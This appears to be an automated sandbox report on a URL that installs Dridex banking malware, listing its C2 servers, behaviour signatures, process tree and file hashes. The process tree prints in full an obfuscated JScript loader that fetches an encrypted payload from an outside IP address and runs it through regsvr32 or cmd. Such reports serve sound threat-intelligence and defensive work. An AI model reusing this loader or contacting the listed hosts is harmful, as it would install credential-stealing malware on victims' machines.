Overview

overview

10

Static

static

URLScan

urlscan

https://ankltraffice...

windows7_x64

10

Analysis

  • max time kernel
    68s
  • max time network
    132s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    09-03-2021 05:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://ankltrafficexit.xyz/trafficexit

  • Sample

    210309-zhdmcx9mws

Score
10/10
dridex10111botnetloader

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

188.165.17.91:8443

210.65.244.186:6601
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Dridex Loader 2 IoCs

    Detects Dridex both x86 and x64 loader in memory.

    botnetloader
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 28 IoCs
    adwarespyware
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://ankltrafficexit.xyz/trafficexit
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1020
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1020 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinHttp.WinH"+"ttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://188.227.85.154/?MjczNjY5&LIjDHTF&s2ht4=Yn6rVCJ2veDSj2beIFxj38VndSTvVgfdOLq1UbgC-jgeDLgEOmMxZC1lE9LetzkWNylaYsJPW-R2JYg4W-5WWErI521zxzrVCdMMklBKC6jBTzekaUVgU5AlFn__IEqWbqUlzBkYxVVzKLZolpR_GVyPuMj13sfO5RDtxq-2T9bd3n5Md&oa1n4=x3rQcvWYaRyPCYjEM__dTaRBP0vYHliPxYq&oFfJdyLfANDAzOA==" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:748
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "cvbdfg" "http://188.227.85.154/?MjczNjY5&LIjDHTF&s2ht4=Yn6rVCJ2veDSj2beIFxj38VndSTvVgfdOLq1UbgC-jgeDLgEOmMxZC1lE9LetzkWNylaYsJPW-R2JYg4W-5WWErI521zxzrVCdMMklBKC6jBTzekaUVgU5AlFn__IEqWbqUlzBkYxVVzKLZolpR_GVyPuMj13sfO5RDtxq-2T9bd3n5Md&oa1n4=x3rQcvWYaRyPCYjEM__dTaRBP0vYHliPxYq&oFfJdyLfANDAzOA==" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:920
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c 97cdn.exe
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1592
            • C:\Users\Admin\AppData\Local\Temp\97cdn.exe
              97cdn.exe
              6⤵
              • Executes dropped EXE
              PID:2004

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    a4bb59c8de49cba4e45264c4291a5e62

    SHA1

    714a845dbe43fe4b8986d90e71416a375e88fec1

    SHA256

    9e27abaae05890b0c15b01233d7667917912b67fd6aa04aea41a71dfc788aeb0

    SHA512

    7829cd1bf077bcc7cf55e2bdb26d7fb4ffbfa7831ee2cb86faf7393637ba1e611fb0f845fba688d8d4c5e5d520d036da442d8f7af4121c8f475f9c17373f6e99

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    f4aad291df4a89703ec916807efe4351

    SHA1

    32a9c9b620196535122c02058169c84653c70cf1

    SHA256

    460bd8959415a67455b88baf4dcb180cbb5894edb10b776b034fcb9085f2aeef

    SHA512

    6444e945cc80c09170a92937761383f7dc2c07173a82d8ac27044765b85581b9180050dc7b128a7a9c17f412581e4b50272113d2036cfa01936761ba5a80c28d

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\97cdn.exe
    MD5

    5e97cb68bd9eccc5bd18b1787f429da3

    SHA1

    b7aae2610b4e82899965bd86a5c1773a07c9538d

    SHA256

    82ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf

    SHA512

    cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\97cdn.exe
    MD5

    5e97cb68bd9eccc5bd18b1787f429da3

    SHA1

    b7aae2610b4e82899965bd86a5c1773a07c9538d

    SHA256

    82ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf

    SHA512

    cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4KWROTH2.txt
    MD5

    e245831150a9e822fd35a00c1af79849

    SHA1

    6cf7cc634e6e670e461af5aa91af212f47e8b980

    SHA256

    e2584d753253bc18399f270a13073e2e7963589a6762eeaf61852927bb58295f

    SHA512

    ce7b3a7491c7f22da7efcbf5779deac6b6ba66ff50e309aba3f8eda694bc4fa68d8d069fa197351e7c1ceda020cfe4aeabc8491f658404ac73687418b77cf208

    Download Submit
  • \Users\Admin\AppData\Local\Temp\97cdn.exe
    MD5

    5e97cb68bd9eccc5bd18b1787f429da3

    SHA1

    b7aae2610b4e82899965bd86a5c1773a07c9538d

    SHA256

    82ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf

    SHA512

    cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1

    Download Submit
  • \Users\Admin\AppData\Local\Temp\97cdn.exe
    MD5

    5e97cb68bd9eccc5bd18b1787f429da3

    SHA1

    b7aae2610b4e82899965bd86a5c1773a07c9538d

    SHA256

    82ed3c12082688828a44c5794cd896247d5f6fd865608454db2884d9c96bcedf

    SHA512

    cb5ac435b6d69967c524f45b26519e5484e2e3799372db358c1a6fd900615202b00d4728d8a1090bfd1ecc6a83486616376a222fdd435fd23b52a9514349a4f1

    Download Submit
  • memory/748-4-0x0000000000000000-mapping.dmp
    Download
  • memory/920-9-0x00000000026D0000-0x00000000026D4000-memory.dmp
    Filesize

    16KB

    Download
  • memory/920-7-0x00000000753E1000-0x00000000753E3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/920-5-0x0000000000000000-mapping.dmp
    Download
  • memory/1276-2-0x000007FEF5BD0000-0x000007FEF5E4A000-memory.dmp
    Filesize

    2.5MB

    Download
  • memory/1592-8-0x0000000000000000-mapping.dmp
    Download
  • memory/1972-3-0x0000000000000000-mapping.dmp
    Download
  • memory/2004-13-0x0000000000000000-mapping.dmp
    Download
  • memory/2004-16-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize

    244KB

    Download
  • memory/2004-17-0x0000000000220000-0x000000000025C000-memory.dmp
    Filesize

    240KB

    Download
  • memory/2004-18-0x0000000000400000-0x000000000043D000-memory.dmp
    Filesize

    244KB

    Download